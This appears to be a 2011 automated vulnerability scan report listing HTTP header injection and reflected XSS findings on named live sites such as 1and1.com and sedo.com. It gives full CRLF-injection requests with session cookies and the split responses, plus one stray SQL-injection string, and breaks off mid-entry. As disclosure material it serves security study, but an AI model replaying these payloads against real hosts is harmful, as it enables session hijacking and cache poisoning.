XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10162011-01

Report generated by XSS.CX at Sun Oct 16 06:44:45 CDT 2011.


1. HTTP header injection

1.1. http://admin.1and1.com/xml/config/Login [REST URL parameter 3]

1.2. https://admin.1and1.com/xml/config/Login [REST URL parameter 3]

1.3. https://admin.1and1.com/xml/config/TaOverview [REST URL parameter 3]

1.4. https://admin.1and1.com/xml/sendpass/passClientNumber [REST URL parameter 3]

1.5. http://mywebsite.1and1.com/Jumpto [jsessionid parameter]

1.6. http://mywebsite.1and1.com/Jumpto [name of an arbitrarily supplied request parameter]

1.7. http://mywebsite.1and1.com/Jumpto [origin.page parameter]

1.8. http://mywebsite.1and1.com/Jumpto [site parameter]

1.9. http://mywebsite.1and1.com/Jumpto [startClub parameter]

1.10. http://mywebsite.1and1.com/build-website [jsessionid parameter]

1.11. http://mywebsitepersonal.1and1.com/create-personal-website [__lf parameter]

1.12. http://order.1and1.com/Jumpto [jsessionid parameter]

1.13. http://order.1and1.com/Jumpto [name of an arbitrarily supplied request parameter]

1.14. http://order.1and1.com/Jumpto [origin.page parameter]

1.15. http://order.1and1.com/Jumpto [page parameter]

1.16. http://order.1and1.com/Jumpto [site parameter]

1.17. https://webmailcluster.perfora.net/xml/webmail/Login [REST URL parameter 3]

2. Cross-site scripting (reflected)

2.1. http://adsfac.eu/ag.asp [cc parameter]

2.2. http://adsfac.eu/ag.asp [clk parameter]

2.3. http://adsfac.eu/ag.asp [clk parameter]

2.4. https://mailxchange.1and1.com/ajax/login [REST URL parameter 2]

2.5. https://mailxchange.1and1.com/ajax/login [action parameter]

2.6. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard [mbox parameter]

2.7. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mbox parameter]

2.8. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mboxId parameter]

2.9. http://omniturestaging.staging.tt.omtrdc.net/m2/omniturestaging/mbox/standard [mbox parameter]

2.10. http://omniturestaging.staging.tt.omtrdc.net/m2/omniturestaging/mbox/standard [mboxFactoryId parameter]

2.11. http://www.omniture.com/en/%0A%22%3E%3Ca%3Exsssss [REST URL parameter 2]

2.12. http://www.omniture.com/en/%0A%22%3E%3Ca%3Exsssssc67e3%22%3E%3Ca%3E922b46dfc9f [REST URL parameter 2]

2.13. http://www.sedo.com/rss/rss_list.php [country parameter]

2.14. http://www.sedo.com/rss/rss_list.php [partnerid parameter]

2.15. http://www.sedo.com/search/service/common.php [f parameter]

2.16. http://www.sedo.com/search/service/common.php [m parameter]

2.17. http://www.sedo.com/search/service/common.php [o parameter]

2.18. http://www.sedo.com/service/common.php [f parameter]

2.19. http://www.sedo.com/service/common.php [m parameter]

2.20. http://www.sedo.com/service/common.php [o parameter]



1. HTTP header injection
There are 17 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://admin.1and1.com/xml/config/Login [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.1and1.com
Path:   /xml/config/Login

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 2ddde%0d%0a15f27619d53 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /xml/config/2ddde%0d%0a15f27619d53?__lf=guided&__rd=ac170c5655Oz7UTnmWntXabz1kqt7mbi&origin[site]=PU.NGC.US&origin[page]=create-personal-website&ucuoId=PUlead%3Adefault.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a HTTP/1.1
Host: admin.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://mywebsitepersonal.1and1.com/;jsessionid=F1E6BADB229760CEAA9FD35CE214E72F.TCpfix223b?linkOrigin=select&linkId=ct.tabs.create-personal-website
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:5:AAABMwoTpgtpXkfrtbMykwlfOvf7KDvW:1318724019723; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:16:29 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=421b6d4c664c7000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: https://admin.1and1.com/xml/config/2ddde
15f27619d53
;jsessionid=4058E76914354CC5C215FFD2723B786B.TC66b?__lf=guided&__rd=ac170c5655Oz7UTnmWntXabz1kqt7mbi&origin[site]=PU.NGC.US&origin[page]=create-personal-website&ucuoId=PUlead%3Adefault.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a
Content-Length: 0
Vary: User-Agent
Content-Type: text/plain; charset=ISO-8859-1


1.2. https://admin.1and1.com/xml/config/Login [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://admin.1and1.com
Path:   /xml/config/Login

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 3c70c%0d%0ac7d3ec588de was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /xml/config/3c70c%0d%0ac7d3ec588de;jsessionid=1BF142CE6043B546CFF49CF9D1F286C6.TC62b?__lf=guided&__rd=ac170c5655Oz7UTnmWntXabz1kqt7mbi&origin[site]=PU.NGC.US&origin[page]=create-personal-website&ucuoId=PUlead%3Adefault.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a HTTP/1.1
Host: admin.1and1.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://mywebsitepersonal.1and1.com/;jsessionid=F1E6BADB229760CEAA9FD35CE214E72F.TCpfix223b?linkOrigin=select&linkId=ct.tabs.create-personal-website
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:7:AAABMwoUNhqkcODo58*XDNYl8svD*ZJD:1318724056602; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10; __PFIX_SEC_fcaeb61968b8f98ffad8a14a1f406eb4=1318724043745:2aaf9d930737a800; __PFIX_TST_=3339023792e16c00

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:18:29 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: https://admin.1and1.com/xml/config/3c70c
c7d3ec588de
?__lf=guided&__rd=ac170c5655Oz7UTnmWntXabz1kqt7mbi&origin[site]=PU.NGC.US&origin[page]=create-personal-website&ucuoId=PUlead%3Adefault.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a
Content-Length: 0
Vary: User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1


1.3. https://admin.1and1.com/xml/config/TaOverview [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://admin.1and1.com
Path:   /xml/config/TaOverview

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload f6651%0d%0a1f3ed0baf2c was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /xml/config/f6651%0d%0a1f3ed0baf2c;jsessionid=7F020952C2848CABB9C6B9DF89D4631C.TC65b HTTP/1.1
Host: admin.1and1.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://admin.1and1.com/xml/config/Login;jsessionid=1BF142CE6043B546CFF49CF9D1F286C6.TC62b?__lf=guided&__rd=ac170c5655Oz7UTnmWntXabz1kqt7mbi&origin[site]=PU.NGC.US&origin[page]=create-personal-website&ucuoId=PUlead%3Adefault.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1u1UALog=1; __PFIX_SEC_fcaeb61968b8f98ffad8a14a1f406eb4=1318724049724:2aaf9d930737a800; emos_jcsid=ChRyAgAAATMab9XBc3FTw*Jce1qFXm9e:1:ChRyAQAAATPAZNJWicW3yHp0a2B*jGnX:1318724071937; emos_jcvid=ChRyAgAAATMab9XBc3FTw*Jce1qFXm9e:1:ChRyAgAAATMab9XBc3FTw*Jce1qFXm9e:1318724071937:0:false:15; emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:8:AAABMwoWMY2wZSfpx1gQT8DuGwTPeYom:1318724186509; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10; __PFIX_TST_=12afd7efe324a400

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:19:57 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: https://admin.1and1.com/xml/config/f6651
1f3ed0baf2c

Content-Length: 0
Vary: User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1


1.4. https://admin.1and1.com/xml/sendpass/passClientNumber [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://admin.1and1.com
Path:   /xml/sendpass/passClientNumber

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload f81df%0d%0a8ac77d3226 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /xml/sendpass/f81df%0d%0a8ac77d3226;jsessionid=8B707E1A341B7FD3A2E520153718BB81.TC65b?__frame=_top&__lf=HomeFlow HTTP/1.1
Host: admin.1and1.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://admin.1and1.com/xml/config/Login;jsessionid=8B707E1A341B7FD3A2E520153718BB81.TC65b?__reuse=1318724183168
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __PFIX_SEC_fcaeb61968b8f98ffad8a14a1f406eb4=1318724049724:2aaf9d930737a800; emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:8:AAABMwoWMY2wZSfpx1gQT8DuGwTPeYom:1318724186509; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10; __PFIX_TST_=12afd7efe324a400; __PFIX_SEC_ad83b72bc54df9d057d189ff55c8ec6a=1318724188818:62b090d584921400; emos_jcsid=ChRyAgAAATMab9XBc3FTw*Jce1qFXm9e:2:ChaNUgAAATMS4djTtkUQk76XLmYYljlk:1318724210002; emos_jcvid=ChRyAgAAATMab9XBc3FTw*Jce1qFXm9e:1:ChRyAgAAATMab9XBc3FTw*Jce1qFXm9e:1318724071937:0:false:15

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:19:10 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: https://admin.1and1.com/xml/sendpass/f81df
8ac77d3226
?__frame=_top&__lf=HomeFlow
Content-Length: 0
Vary: User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1


1.5. http://mywebsite.1and1.com/Jumpto [jsessionid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mywebsite.1and1.com
Path:   /Jumpto

Issue detail

The value of the jsessionid request parameter is copied into the Location response header. The payload cf19b%0d%0abd512bc408d was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.

Request

GET /Jumpto;jsessionid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b?__lf=guidedcf19b%0d%0abd512bc408d&origin.page=build-website&linkOrigin=build-website&linkId=weiter&startClub=false&site=PU.NGC.US HTTP/1.1
Host: mywebsite.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://mywebsite.1and1.com/;jsessionid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b?__reuse=1318723908161&__lf=Static
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: variant.configname=2010-11-12; variant="bGVhZDpkZWZhdWx0""; _ut=aZVoqWFBLZDliYmJcb2VsMmpkMSMtZllTK0I1LxcyLy8uLSsrLygpJyYoKR8hIB8cQS9bUGl3MC8tXTVfbjQnKCUrKSMjKB4lHSAjO3N0Oi02Zm81KCkmLCokJCkfJh4hJA==; emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:2:AAABMwoSV1xjeIGFZAlpKqGNb2QXMatX:1318723934044; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:12:56 GMT
Server: Apache
Location: http://redirect.1and1.com/ac170c55P5SqPtlGgDqAkvhpyGHa9HP2/?origin.site=PU.NGH.US&origin.sid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b&origin.page=build-website&target.site=PU.NGC.US&global.ucuoId=PUlead:default.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a&startClub=false&__lf=guidedcf19b
bd512bc408d

Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: _ut=fYGw8amJdXzRdXV1XamBnLWVfLB4oYVROPVRHQSktKiopKCYmKiMkIiEjJBocGxouU0FtYmRyKyooWDBaaS8iIyAmJB4eIzA3LzI1Nm5vNSgxYWowIyQhJyUfHyQaODAzNg==; Expires=Fri, 03-Nov-2079 03:27:03 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html;charset=UTF-8


1.6. http://mywebsite.1and1.com/Jumpto [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mywebsite.1and1.com
Path:   /Jumpto

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload bf42f%0d%0a0a2e5487a6a was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /Jumpto;jsessionid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b?__lf=guided&origin.page=build-website&linkOrigin=build-website&linkId=weiter&startClub=false&site=PU.NGC.US&bf42f%0d%0a0a2e5487a6a=1 HTTP/1.1
Host: mywebsite.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://mywebsite.1and1.com/;jsessionid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b?__reuse=1318723908161&__lf=Static
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: variant.configname=2010-11-12; variant="bGVhZDpkZWZhdWx0""; _ut=aZVoqWFBLZDliYmJcb2VsMmpkMSMtZllTK0I1LxcyLy8uLSsrLygpJyYoKR8hIB8cQS9bUGl3MC8tXTVfbjQnKCUrKSMjKB4lHSAjO3N0Oi02Zm81KCkmLCokJCkfJh4hJA==; emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:2:AAABMwoSV1xjeIGFZAlpKqGNb2QXMatX:1318723934044; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:15:00 GMT
Server: Apache
Location: http://redirect.1and1.com/ac170c55P5SqPtlGgDqAkvhpyGHa9HP2/?origin.site=PU.NGH.US&origin.sid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b&origin.page=build-website&target.site=PU.NGC.US&global.ucuoId=PUlead:default.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a&startClub=false&bf42f
0a2e5487a6a
=1&__lf=guided
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: _ut=aZVoqWFBLZDliYmJcb2VsMmpkMSMtZllTK0I1LxcyLy8uLSsrLygpJyYoKR8hIB8cQS9bUGl3MC8tXTVfbjQnKCUrKSMjKB4lHSAjO3N0Oi02Zm81KCkmLCokJCkfJh4hJA==; Expires=Fri, 03-Nov-2079 03:29:07 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html;charset=UTF-8


1.7. http://mywebsite.1and1.com/Jumpto [origin.page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mywebsite.1and1.com
Path:   /Jumpto

Issue detail

The value of the origin.page request parameter is copied into the Location response header. The payload 11d40%0d%0aec5e36e0f3b was submitted in the origin.page parameter. This caused a response containing an injected HTTP header.

Request

GET /Jumpto;jsessionid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b?__lf=guided&origin.page=11d40%0d%0aec5e36e0f3b&linkOrigin=build-website&linkId=weiter&startClub=false&site=PU.NGC.US HTTP/1.1
Host: mywebsite.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://mywebsite.1and1.com/;jsessionid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b?__reuse=1318723908161&__lf=Static
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: variant.configname=2010-11-12; variant="bGVhZDpkZWZhdWx0""; _ut=aZVoqWFBLZDliYmJcb2VsMmpkMSMtZllTK0I1LxcyLy8uLSsrLygpJyYoKR8hIB8cQS9bUGl3MC8tXTVfbjQnKCUrKSMjKB4lHSAjO3N0Oi02Zm81KCkmLCokJCkfJh4hJA==; emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:2:AAABMwoSV1xjeIGFZAlpKqGNb2QXMatX:1318723934044; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:13:13 GMT
Server: Apache
Location: http://redirect.1and1.com/ac170c55P5SqPtlGgDqAkvhpyGHa9HP253614101' or 1=1-- /?origin.site=PU.NGH.US&origin.sid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b&origin.page=11d40
ec5e36e0f3b
&target.site=PU.NGC.US&global.ucuoId=PUlead:default.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a&startClub=false&__lf=guided
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: _ut=CY1goVmVgYjdgYGBabWNqMGhiLyErZFdRKUAzRCwwLS0sKykpLSYnJSQmJx0fHh0aPy1wZWd1Li0rWzNdbDIlJiMpJyEhJhwjGzU4OXFyOCs0ZG0zJickKigiIicdJBwfOQ==; Expires=Fri, 03-Nov-2079 03:27:20 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html;charset=UTF-8


1.8. http://mywebsite.1and1.com/Jumpto [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mywebsite.1and1.com
Path:   /Jumpto

Issue detail

The value of the site request parameter is copied into the Location response header. The payload bef90%0d%0a11c14971bbd was submitted in the site parameter. This caused a response containing an injected HTTP header.

Request

GET /Jumpto;jsessionid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b?__lf=guided&origin.page=build-website&linkOrigin=build-website&linkId=weiter&startClub=false&site=bef90%0d%0a11c14971bbd HTTP/1.1
Host: mywebsite.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://mywebsite.1and1.com/;jsessionid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b?__reuse=1318723908161&__lf=Static
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: variant.configname=2010-11-12; variant="bGVhZDpkZWZhdWx0""; _ut=aZVoqWFBLZDliYmJcb2VsMmpkMSMtZllTK0I1LxcyLy8uLSsrLygpJyYoKR8hIB8cQS9bUGl3MC8tXTVfbjQnKCUrKSMjKB4lHSAjO3N0Oi02Zm81KCkmLCokJCkfJh4hJA==; emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:2:AAABMwoSV1xjeIGFZAlpKqGNb2QXMatX:1318723934044; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:14:09 GMT
Server: Apache
Location: http://redirect.1and1.com/ac170c55P5SqPtlGgDqAkvhpyGHa9HP2/?origin.site=PU.NGH.US&origin.sid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b&origin.page=build-website&target.site=bef90
11c14971bbd
&global.ucuoId=PUlead:default.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a&startClub=false&__lf=guided
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: _ut=TaV4uXFRPUSZPT2Zgc2lwNm5oNScxal1XL0Y5MxsfHBwbMS8vMywtKyosLSMlJCMgRTNfVFZkHRwxYTljcjgrLCkvLScnLCIpISQnKGBhJzE6anM5LC0qMC4oKC0jKiIlKA==; Expires=Fri, 03-Nov-2079 03:28:16 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html;charset=UTF-8


1.9. http://mywebsite.1and1.com/Jumpto [startClub parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mywebsite.1and1.com
Path:   /Jumpto

Issue detail

The value of the startClub request parameter is copied into the Location response header. The payload e979c%0d%0a3195436f668 was submitted in the startClub parameter. This caused a response containing an injected HTTP header.

Request

GET /Jumpto;jsessionid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b?__lf=guided&origin.page=build-website&linkOrigin=build-website&linkId=weiter&startClub=e979c%0d%0a3195436f668&site=PU.NGC.US HTTP/1.1
Host: mywebsite.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://mywebsite.1and1.com/;jsessionid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b?__reuse=1318723908161&__lf=Static
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: variant.configname=2010-11-12; variant="bGVhZDpkZWZhdWx0""; _ut=aZVoqWFBLZDliYmJcb2VsMmpkMSMtZllTK0I1LxcyLy8uLSsrLygpJyYoKR8hIB8cQS9bUGl3MC8tXTVfbjQnKCUrKSMjKB4lHSAjO3N0Oi02Zm81KCkmLCokJCkfJh4hJA==; emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:2:AAABMwoSV1xjeIGFZAlpKqGNb2QXMatX:1318723934044; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:13:53 GMT
Server: Apache
Location: http://redirect.1and1.com/ac170c55P5SqPtlGgDqAkvhpyGHa9HP2/?origin.site=PU.NGH.US&origin.sid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b&origin.page=build-website&target.site=PU.NGC.US&global.ucuoId=PUlead:default.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a&startClub=e979c
3195436f668
&__lf=guided
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: _ut=wZlsrWVFMTjpjY2NdcGZtM2tlMiQuZ1pULEM2MBgcMDAvLiwsMCkqKCcpKiAiISAdQjBcUVN4MTAuXjZgbzUoKSYsKiQkKR8mHiEkJXR1Oy43Z3A2KSonLSslJSogJx8iJQ==; Expires=Fri, 03-Nov-2079 03:28:00 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html;charset=UTF-8


1.10. http://mywebsite.1and1.com/build-website [jsessionid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mywebsite.1and1.com
Path:   /build-website

Issue detail

The value of the jsessionid request parameter is copied into the Location response header. The payload 1d2d8%0d%0a4b0a099611f was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.

Request

GET /build-website;jsessionid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b?__lf=Static1d2d8%0d%0a4b0a099611f&__rd=ac170c55P5SqPtlGgDqAkvhpyGHa9HP2&origin[site]=PU.WH.US&origin[page]=Home&ucuoId=PUlead%3Adefault.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a HTTP/1.1
Host: mywebsite.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://order.1and1.com/;jsessionid=25F9478E2046C94EAA509963E4903167.TCpfix241a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2lTHzFUwMc9tG_kstw966Ml:1318723912553; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:12:36 GMT
Server: Apache
